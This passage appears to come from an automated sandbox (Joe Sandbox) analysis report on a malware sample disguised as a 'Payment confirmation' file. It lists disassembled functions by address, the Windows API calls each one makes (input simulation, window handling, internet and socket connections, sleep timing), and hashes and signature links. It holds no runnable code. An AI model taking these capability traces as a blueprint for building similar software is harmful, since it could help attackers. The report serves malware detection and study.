                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: KeyboardState$InputMessagePostSend
                                          • String ID:
                                          • API String ID: 432972143-0
                                          • Opcode ID: ed3e2173f019152d1c3218f78838de8b0f7a07ed5b1b4b00f402e2ec260978e9
                                          • Instruction ID: e4c3287525d56845e9ca6183fe8cf30e28c91d9b9ed5611c44b60757ddf3eec4
                                          • Opcode Fuzzy Hash: ed3e2173f019152d1c3218f78838de8b0f7a07ed5b1b4b00f402e2ec260978e9
                                          • Instruction Fuzzy Hash: 3D310771A00278DFFF31AB6CD8087FE7FA9AB49318F14415AE1C6569C5C7748948C761
                                          Function 01314DB4 Relevance: 6.1, APIs: 4, Instructions: 96COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 01314DE8
                                          • __isleadbyte_l.LIBCMT ref: 01314E16
                                          • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,?,00000000,?,00000000,?,?,?), ref: 01314E44
                                          • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,?,00000000,?,00000000,?,?,?), ref: 01314E7A
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                          • String ID:
                                          • API String ID: 3058430110-0
                                          • Opcode ID: db31614618d4d56247df9075e25665420a28abf6826fe6f9ec078d6b54e207d7
                                          • Instruction ID: ccb595b1022984d805b19238a8fc103a6106d52101950af8fa8bb1f62c39c171
                                          • Opcode Fuzzy Hash: db31614618d4d56247df9075e25665420a28abf6826fe6f9ec078d6b54e207d7
                                          • Instruction Fuzzy Hash: 2931B231604206EFDF268F78C844BAA7FA9FF41318F158528E9658B1E5E730D851CBA0
                                          Function 01347AA2 Relevance: 6.1, APIs: 4, Instructions: 93COMMON
                                          Download Yara Rule
                                          APIs
                                          • GetForegroundWindow.USER32 ref: 01347AB6
                                            • Part of subcall function 013269C9: GetWindowThreadProcessId.USER32(?,00000000), ref: 013269E3
                                            • Part of subcall function 013269C9: GetCurrentThreadId.KERNEL32(00000000,?,01328127), ref: 013269EA
                                            • Part of subcall function 013269C9: AttachThreadInput.USER32(00000000,?,01328127), ref: 013269F1
                                          • GetCaretPos.USER32(?), ref: 01347AC7
                                          • ClientToScreen.USER32(00000000,?), ref: 01347B00
                                          • GetForegroundWindow.USER32 ref: 01347B06
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                          • String ID:
                                          • API String ID: 2759813231-0
                                          • Opcode ID: ee5cfe924fe3d9a23ba3cc82086f446a333ac253e2d77802a820c13b5e8184f2
                                          • Instruction ID: 52f91f4aa36604097815437a43047b336fc6c368cc96f8932f9c6cac149a34c8
                                          • Opcode Fuzzy Hash: ee5cfe924fe3d9a23ba3cc82086f446a333ac253e2d77802a820c13b5e8184f2
                                          • Instruction Fuzzy Hash: FE312171D00109AFCB10EFB9D8859EFFBFDEF59314B10806AE916E3210DA359E058BA0
                                          Function 0133497B Relevance: 6.1, APIs: 4, Instructions: 78networkCOMMON
                                          Download Yara Rule
                                          APIs
                                          • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 013349B7
                                            • Part of subcall function 01334A41: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 01334A60
                                            • Part of subcall function 01334A41: InternetCloseHandle.WININET(00000000), ref: 01334AFD
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: Internet$CloseConnectHandleOpen
                                          • String ID:
                                          • API String ID: 1463438336-0
                                          • Opcode ID: a443ea2a11d3eb985f54998e3180791e832cb49be8e78d537b6c043eede72bdd
                                          • Instruction ID: 62ad9467b8123f2992ba640ce802db8324151f5ed6429b3ae534e862c06acaf0
                                          • Opcode Fuzzy Hash: a443ea2a11d3eb985f54998e3180791e832cb49be8e78d537b6c043eede72bdd
                                          • Instruction Fuzzy Hash: D721A172300605BFEB129FA49C00FBABBADFBC8715F04401AFA4596650EB71D421A798
                                          Function 01348834 Relevance: 6.1, APIs: 4, Instructions: 69COMMON
                                          Download Yara Rule
                                          APIs
                                          • GetWindowLongW.USER32(?,000000EC), ref: 013488A3
                                          • SetWindowLongW.USER32(?,000000EC,00000000), ref: 013488BD
                                          • SetWindowLongW.USER32(?,000000EC,00000000), ref: 013488CB
                                          • SetLayeredWindowAttributes.USER32 ref: 013488D9
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: Window$Long$AttributesLayered
                                          • String ID:
                                          • API String ID: 2169480361-0
                                          • Opcode ID: 9aa66a931585eb2bf2d872dd0760b8a61e9d29935ea0df374a9c63ae549d691b
                                          • Instruction ID: 5d4e8967b80e665c33f2447c07e2b6d264d4bf2ab15d8fca6fe5db1b4b388a51
                                          • Opcode Fuzzy Hash: 9aa66a931585eb2bf2d872dd0760b8a61e9d29935ea0df374a9c63ae549d691b
                                          • Instruction Fuzzy Hash: 4811AC31304115AFEB15ABA8DC08FBA7BEEAF95324F048119F916D72A1CB60BC008B90
                                          Function 0133900C Relevance: 6.1, APIs: 4, Instructions: 69networkCOMMON
                                          Download Yara Rule
                                          APIs
                                          • select.WSOCK32(00000000,00000001,00000000,00000000,?), ref: 0133906D
                                          • __WSAFDIsSet.WSOCK32(00000000,00000001), ref: 0133907F
                                          • accept.WSOCK32(00000000,00000000,00000000), ref: 0133908C
                                          • WSAGetLastError.WSOCK32(00000000), ref: 013390A3
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: ErrorLastacceptselect
                                          • String ID:
                                          • API String ID: 385091864-0
                                          • Opcode ID: ec3a09a3acfa73758823a7301afb99500c6438b21b634dfd699e657f6c7de0f6
                                          • Instruction ID: 1a89b4f1f0d46ec5fc35930b8fbe180b6e5ad08ff69399c9b3166b102cdbe49a
                                          • Opcode Fuzzy Hash: ec3a09a3acfa73758823a7301afb99500c6438b21b634dfd699e657f6c7de0f6
                                          • Instruction Fuzzy Hash: F221A871A001249FC720DF69D884A9EBBFCEF4A714F00816AE849D7290D774DA45CFD1
                                          Function 013218E8 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 68stringCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 01322CAA: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,013218FD,?,?,?,013226BC,00000000,000000EF,00000119,?,?), ref: 01322CB9
                                            • Part of subcall function 01322CAA: lstrcpyW.KERNEL32(00000000,?), ref: 01322CDF
                                            • Part of subcall function 01322CAA: lstrcmpiW.KERNEL32(00000000,?,013218FD,?,?,?,013226BC,00000000,000000EF,00000119,?,?), ref: 01322D10
                                          • lstrlenW.KERNEL32(?,00000002,?,?,?,?,013226BC,00000000,000000EF,00000119,?,?,00000000), ref: 01321916
                                          • lstrcpyW.KERNEL32(00000000,?), ref: 0132193C
                                          • lstrcmpiW.KERNEL32(00000002,cdecl,?,013226BC,00000000,000000EF,00000119,?,?,00000000), ref: 01321970
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: lstrcmpilstrcpylstrlen
                                          • String ID: cdecl
                                          • API String ID: 4031866154-3896280584
                                          • Opcode ID: 8b65c7829c9059d5a0c47300473d43a2affc248a504e359f4eaf8d5c0eabb5d4
                                          • Instruction ID: 3ed5227fdc5f47f291faf94199dfdb069157166d47832d74fdefec6806e8a65f
                                          • Opcode Fuzzy Hash: 8b65c7829c9059d5a0c47300473d43a2affc248a504e359f4eaf8d5c0eabb5d4
                                          • Instruction Fuzzy Hash: E311E63A200315EFDB26AF79D844D7A77B8FF45354B40802AF846CB254EB719441C7D0
                                          Function 01313D46 Relevance: 6.1, APIs: 4, Instructions: 67COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          • _free.LIBCMT ref: 01313D65
                                            • Part of subcall function 013045EC: __FF_MSGBANNER.LIBCMT ref: 01304603
                                            • Part of subcall function 013045EC: __NMSG_WRITE.LIBCMT ref: 0130460A
                                            • Part of subcall function 013045EC: RtlAllocateHeap.NTDLL(00720000,00000000,00000001,?,?,?,?,01300127,?,012E125D,00000058,?,?), ref: 0130462F
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: AllocateHeap_free
                                          • String ID:
                                          • API String ID: 614378929-0
                                          • Opcode ID: 5761efd9e406b85a537b498d19584d4c006dccb3d2b8d21b15aefe999271fe80
                                          • Instruction ID: 14ed9a171bc42b1ce315d5d6a4cfd6b56039d914178792040c3fd934ba72eb41
                                          • Opcode Fuzzy Hash: 5761efd9e406b85a537b498d19584d4c006dccb3d2b8d21b15aefe999271fe80
                                          • Instruction Fuzzy Hash: DF11A332901216ABDB3A3FBCA8146AA3FDCBF1037CF904569E9899A1D8DB3489408750
                                          Function 013213D1 Relevance: 6.1, APIs: 4, Instructions: 64registryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 013213EE
                                          • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 01321409
                                          • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 0132141F
                                          • FreeLibrary.KERNEL32(?), ref: 01321474
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: Type$FileFreeLibraryLoadModuleNameRegister
                                          • String ID:
                                          • API String ID: 3137044355-0
                                          • Opcode ID: 78e78bc7e8910b504b8aa275506cacca6f116e8ef9460a89b72764a96b0ef108
                                          • Instruction ID: f9aa4df1577a51d49f5c66ab64ba84be14d947063030e49990d2e9b731393432
                                          • Opcode Fuzzy Hash: 78e78bc7e8910b504b8aa275506cacca6f116e8ef9460a89b72764a96b0ef108
                                          • Instruction Fuzzy Hash: 9721AF7160021DEBEB20AF95ED88ADABBBCEF00708F008469D65AA7410D7B4EA04CF50
                                          Function 013392C0 Relevance: 6.1, APIs: 4, Instructions: 60networkCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 012FF26B: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,0132AEA5,?,?,00000000,00000008), ref: 012FF282
                                            • Part of subcall function 012FF26B: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,0132AEA5,?,?,00000000,00000008), ref: 012FF2A6
                                          • gethostbyname.WSOCK32(?,?,?), ref: 013392F0
                                          • WSAGetLastError.WSOCK32(00000000), ref: 013392FB
                                          • _memmove.LIBCMT ref: 01339328
                                          • inet_ntoa.WSOCK32(?), ref: 01339333
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
                                          • String ID:
                                          • API String ID: 1504782959-0
                                          • Opcode ID: 90c60acd5e4e22d7a6fc5db7dab936ad7a5c9bd0fc107017be96c3edd28f8c53
                                          • Instruction ID: 907c5b8cd4eac676396ade1a1574ed048cd96c3eaa67ea1224d54846e0fa414f
                                          • Opcode Fuzzy Hash: 90c60acd5e4e22d7a6fc5db7dab936ad7a5c9bd0fc107017be96c3edd28f8c53
                                          • Instruction Fuzzy Hash: F9118E7660000AAFCB00FFA4C958CBEB7B9EF68314B504028E506A7260DB30AE14CB61
                                          Function 0131C265 Relevance: 6.1, APIs: 4, Instructions: 58windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • SendMessageW.USER32(?,000000B0,?,?), ref: 0131C285
                                          • SendMessageW.USER32(?,000000C9,?,00000000), ref: 0131C297
                                          • SendMessageW.USER32(?,000000C9,?,00000000), ref: 0131C2AD
                                          • SendMessageW.USER32(?,000000C9,?,00000000), ref: 0131C2C8
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: MessageSend
                                          • String ID:
                                          • API String ID: 3850602802-0
                                          • Opcode ID: 8271ff7a634f4dbaf65a359054488336756c3becf5ee05bbafc5e0bff5227ae7
                                          • Instruction ID: 5aef56bb26f6bd20dee80580c919efd440fe41d30a124769bcd056f31563bda3
                                          • Opcode Fuzzy Hash: 8271ff7a634f4dbaf65a359054488336756c3becf5ee05bbafc5e0bff5227ae7
                                          • Instruction Fuzzy Hash: 1511037A940218BFEF11DBE8C885EDDBBB8FB08714F204091EA05B7294D671AE11DB94
                                          Function 01327C45 Relevance: 6.1, APIs: 4, Instructions: 55synchronizationthreadwindowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetCurrentThreadId.KERNEL32 ref: 01327C6C
                                          • MessageBoxW.USER32 ref: 01327C9F
                                          • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 01327CB5
                                          • CloseHandle.KERNEL32(00000000), ref: 01327CBC
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                          • String ID:
                                          • API String ID: 2880819207-0
                                          • Opcode ID: 9faca559db11763526212a452addaa4b9c572c849b83a6a7b5a2444553cfccd5
                                          • Instruction ID: fc3eac739729ea6548458e50cde0951b7ada41237fa8b3879ebf13f0ace00b01
                                          • Opcode Fuzzy Hash: 9faca559db11763526212a452addaa4b9c572c849b83a6a7b5a2444553cfccd5
                                          • Instruction Fuzzy Hash: 8B112B76B04264FFDB229FBCDC08AAB7FADBB04328F044255F555E3245D6B089048760
                                          Function 012FC619 Relevance: 6.1, APIs: 4, Instructions: 53windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • CreateWindowExW.USER32 ref: 012FC657
                                          • GetStockObject.GDI32(00000011), ref: 012FC66B
                                          • SendMessageW.USER32(00000000,00000030,00000000), ref: 012FC675
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: CreateMessageObjectSendStockWindow
                                          • String ID:
                                          • API String ID: 3970641297-0
                                          • Opcode ID: b57a0a72486e67932cae9d08c6a3b285618d179bb1c80969f8c305f4e9fd1e37
                                          • Instruction ID: 6e2d55e9e2c8662ff05acb130afa83b715d7c8216eec46df5efa7a1a5e8136bc
                                          • Opcode Fuzzy Hash: b57a0a72486e67932cae9d08c6a3b285618d179bb1c80969f8c305f4e9fd1e37
                                          • Instruction Fuzzy Hash: 64118BB261564DBFEF224FA49C41EEABF6DEF48364F054229FB0452050C732EC609BA0
                                          Function 013249D1 Relevance: 6.0, APIs: 4, Instructions: 50sleepCOMMON
                                          Download Yara Rule
                                          APIs
                                          • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,0132354D,?,013245D5,?,00008000), ref: 013249EE
                                          • Sleep.KERNEL32(00000000,?,?,?,?,?,?,0132354D,?,013245D5,?,00008000), ref: 01324A13
                                          • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,0132354D,?,013245D5,?,00008000), ref: 01324A1D
                                          • Sleep.KERNEL32(?,?,?,?,?,?,?,0132354D,?,013245D5,?,00008000), ref: 01324A50
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: CounterPerformanceQuerySleep
                                          • String ID:
                                          • API String ID: 2875609808-0
                                          • Opcode ID: e94d94f536ed305beb805a5ab224b7561ba0cafa0b481edc3ccde2fe8ae23fcc
                                          • Instruction ID: f795d94d348eaa839ebf968fe389294f37c185b3542f7d6a8a09f4b95bc8fd61
                                          • Opcode Fuzzy Hash: e94d94f536ed305beb805a5ab224b7561ba0cafa0b481edc3ccde2fe8ae23fcc
                                          • Instruction Fuzzy Hash: F3112771E0052DDBDF10AFE5DA89AEEBB78FF08715F014055EA82B2244CB709550CBA9
                                          Function 01315BA2 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                          • String ID:
                                          • API String ID: 3016257755-0
                                          • Opcode ID: 3c6a35542a271610c24967ae1addb0a5128256cd46e27c9700edfec13bdc5c5a
                                          • Instruction ID: 02eede46d0fba5ec64e96961f58330e1174eb2cb5f3892b15f6382d8caaf8cb4
                                          • Opcode Fuzzy Hash: 3c6a35542a271610c24967ae1addb0a5128256cd46e27c9700edfec13bdc5c5a
                                          • Instruction Fuzzy Hash: A1014C7200014EBBCF1A5F88DC41CEE3F66BB5D358B488915FE1859034D336C6B2AB81
                                          Function 0134DDEE Relevance: 6.0, APIs: 4, Instructions: 44COMMON
                                          Download Yara Rule
                                          APIs
                                          • GetWindowRect.USER32(?,?), ref: 0134DE07
                                          • ScreenToClient.USER32(?,?), ref: 0134DE1F
                                          • ScreenToClient.USER32(?,?), ref: 0134DE43
                                          • InvalidateRect.USER32(?,?,?), ref: 0134DE5E
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: ClientRectScreen$InvalidateWindow
                                          • String ID:
                                          • API String ID: 357397906-0
                                          • Opcode ID: de55d65809dda72885bb0990ad8eee58a5e18e40f722aebf54535c884ab8d0b1
                                          • Instruction ID: 5d6006779c38db2a7424b631489d4fd2319d20ed5472877d5070b5429c8b46fa
                                          • Opcode Fuzzy Hash: de55d65809dda72885bb0990ad8eee58a5e18e40f722aebf54535c884ab8d0b1
                                          • Instruction Fuzzy Hash: 66115DB9E00209EFDB11DFA9C4849EEBBF9FB08310F508166E965E3224D735AA54CF50
                                          Function 01308724 Relevance: 6.0, APIs: 4, Instructions: 41COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          • __lock.LIBCMT ref: 01308768
